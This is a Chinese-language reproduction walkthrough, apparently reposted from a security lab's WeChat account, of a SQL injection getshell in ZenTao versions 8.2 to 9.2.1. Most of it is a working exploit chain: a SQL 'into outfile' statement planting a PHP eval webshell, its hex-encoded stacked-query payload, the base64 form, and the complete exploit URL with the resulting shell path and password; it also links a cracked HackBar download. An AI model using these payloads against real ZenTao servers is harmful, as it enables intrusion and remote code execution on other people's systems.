漏洞环境
禅道集成环境
https://pan.baidu.com/s/1JOsZ-GbeDVoX8RnqIFGYtw
提取码r04p
Hackbar破解版
https://pan.baidu.com/s/1JEQR2h1d6wepp5mGbTduxQ
提取码no3v
漏洞危害
Get shell
影响范围
V8.2-V9.2.1
漏洞复现
下载集成环境后,默认安装即可
然后点击start.exe开启环境,启动环境之后访问禅道
查看目标版本
http://127.0.0.1:81/zentao/index.php?mode=getconfig
发现版本为8.4然后输入任意不存在的路径会爆出绝对路径
如果这种方法得不到绝对路径就利用忘记密码功能去找绝对路径
得到绝对路径就可以写入shell了,构造SQL语句
select '<?php @eval($_POST[1])?>' into outfile 'C:/111111111candao/xampp/zentao/www/zjt.php'对其进行16进制转化
73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027433a2f31313131313131313163616e64616f2f78616d70702f7a656e74616f2f7777772f7a6a742e70687027然后把转化得到的结果放到完整的exp里面
{"orderBy":"order limit 1;SET @SQL=0x73656c65637420273c3f70687020406576616c28245f504f53545b315d293f3e2720696e746f206f757466696c652027433a2f31313131313131313163616e64616f2f78616d70702f7a656e74616f2f7777772f7a6a742e70687027;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}对完整的EXP进行base64编码
eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxNWQyOTNmM2UyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyNzQzM2EyZjMxMzEzMTMxMzEzMTMxMzEzMTYzNjE2ZTY0NjE2ZjJmNzg2MTZkNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjdhNmE3NDJlNzA2ODcwMjc7UFJFUEFSRSBwb3JkIEZST00gQFNRTDtFWEVDVVRFIHBvcmQ7LS0gLSIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0=通过hackbar写入shell文件(记得加上Referer,hackbar不会破解的私信我)
http://127.0.0.1:81/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtTRVQgQFNRTD0weDczNjU2YzY1NjM3NDIwMjczYzNmNzA2ODcwMjA0MDY1NzY2MTZjMjgyNDVmNTA0ZjUzNTQ1YjMxNWQyOTNmM2UyNzIwNjk2ZTc0NmYyMDZmNzU3NDY2Njk2YzY1MjAyNzQzM2EyZjMxMzEzMTMxMzEzMTMxMzEzMTYzNjE2ZTY0NjE2ZjJmNzg2MTZkNzA3MDJmN2E2NTZlNzQ2MTZmMmY3Nzc3NzcyZjdhNmE3NDJlNzA2ODcwMjc7UFJFUEFSRSBwb3JkIEZST00gQFNRTDtFWEVDVVRFIHBvcmQ7LS0gLSIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0
已写入shell文件
Shell地址
http://127.0.0.1:81/zentao/zjt.php
口令1
原文始发于微信公众号(赛瑞攻防实验室):禅道Getshell漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论